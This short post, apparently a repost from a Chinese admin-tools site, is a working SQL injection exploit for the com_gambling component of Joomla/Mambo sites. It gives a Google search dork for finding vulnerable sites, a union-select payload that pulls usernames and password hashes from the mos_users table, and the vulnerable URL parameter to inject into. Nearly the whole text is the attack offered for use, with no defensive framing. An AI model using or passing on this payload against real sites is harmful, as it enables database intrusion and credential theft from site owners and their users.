google: inurl:com_gambling

Exploit:
-9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*

利用：http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid \
=10&gamblingEvent=[Exploit]

文章如转载，请注明转载自：http://www.5iadmin.com/post/226.html